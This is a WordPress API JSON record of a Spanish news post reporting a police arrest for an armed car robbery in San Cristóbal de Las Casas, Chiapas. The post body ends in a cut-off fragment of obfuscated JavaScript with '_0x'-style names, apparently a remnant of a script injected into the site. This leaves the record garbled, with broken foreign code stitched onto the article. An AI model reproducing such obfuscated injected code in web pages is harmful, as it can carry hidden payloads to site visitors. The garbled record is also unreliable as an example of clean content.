{"id":3834,"date":"2022-07-23T01:11:56","date_gmt":"2022-07-23T01:11:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3834"},"modified":"2022-07-23T01:11:57","modified_gmt":"2022-07-23T01:11:57","slug":"detienen-a-presunto-ladron-de-vehiculo-en-la-zona-norte-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3834","title":{"rendered":"Detienen a presunto ladr\u00f3n de veh\u00edculo en la zona Norte de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"661\" height=\"841\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-22-at-3.27.05-PM-2.jpeg\" alt=\"\" class=\"wp-image-3835\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-22-at-3.27.05-PM-2.jpeg 661w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-22-at-3.27.05-PM-2-236x300.jpeg 236w\" sizes=\"auto, (max-width: 661px) 100vw, 661px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>22 de Julio del 2022. San Crist\u00f3bal de Las Casas. &#8211; Como resultado de un fuerte dispositivo de b\u00fasqueda y localizaci\u00f3n, elementos de la Polic\u00eda Municipal, recuperaron en las \u00faltimas horas un veh\u00edculo con reporte de robo y detuvieron a Juan Carlos &#8220;N N&#8221;, de 29 a\u00f1os de edad, quien fue puesto a disposici\u00f3n del ministerio p\u00fablico por delito de robo con violencia agravado, en hechos ocurridos en la colonia Macedonia. De acuerdo con el informe policial, alrededor de las 19:00 horas de este jueves se recibi\u00f3 llamado de emergencia, a trav\u00e9s del cual se reportaba el robo con violencia de un veh\u00edculo de la Marca Chevrolet, tipo Chevy, modelo 2006, de color guida, sobre el Perif\u00e9rico Norte, a la altura de una conocida tienda departamental, por lo que con apoyo de varias unidades, se instrument\u00f3 un dispositivo de seguridad para localizar la unidad. Gracias a la descripci\u00f3n f\u00edsica proporcionada por el propietario, de nombre Celestino &#8220;N N&#8221;, el agresor fue identificado en calles del Barrio de San Ram\u00f3n, donde fue detenido. A la par de estas acciones, los elementos municipales lograron ubicar el veh\u00edculo robado alrededor de las 20:00 horas en el interior de un auto lavado que se encuentra sobre la Prolongaci\u00f3n Primero de Marzo, en el Barrio de La Merced, a un costado de la Hemeroteca Municipal, donde el imputado ya hab\u00eda hecho pl\u00e1ticas con otra persona, para que se lo comprara. Luego de que la v\u00edctima se\u00f1al\u00f3 al agresor de haberlo despojado del veh\u00edculo con un arma de fuego, los elementos trasladaron a Juan Carlos &#8220;N N&#8221; a las instalaciones de la Fiscal\u00eda de Distrito Altos, donde fue puesto a disposici\u00f3n como probable responsable del delito de robo con violencia agravado, a fin de que esta autoridad determine su situaci\u00f3n jur\u00eddica conforme a derecho.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 22 de Julio del 2022. San Crist\u00f3bal de Las Casas. &#8211; Como resultado de un fuerte dispositivo de b\u00fasqueda y localizaci\u00f3n, elementos de la Polic\u00eda Municipal, recuperaron en las \u00faltimas horas un veh\u00edculo con reporte de robo y detuvieron a Juan Carlos &#8220;N N&#8221;, de 29 a\u00f1os de edad, quien fue puesto a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3835,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3834","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3834","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3834"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3834\/revisions"}],"predecessor-version":[{"id":3836,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3834\/revisions\/3836"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3835"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3834"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3834"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3834"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}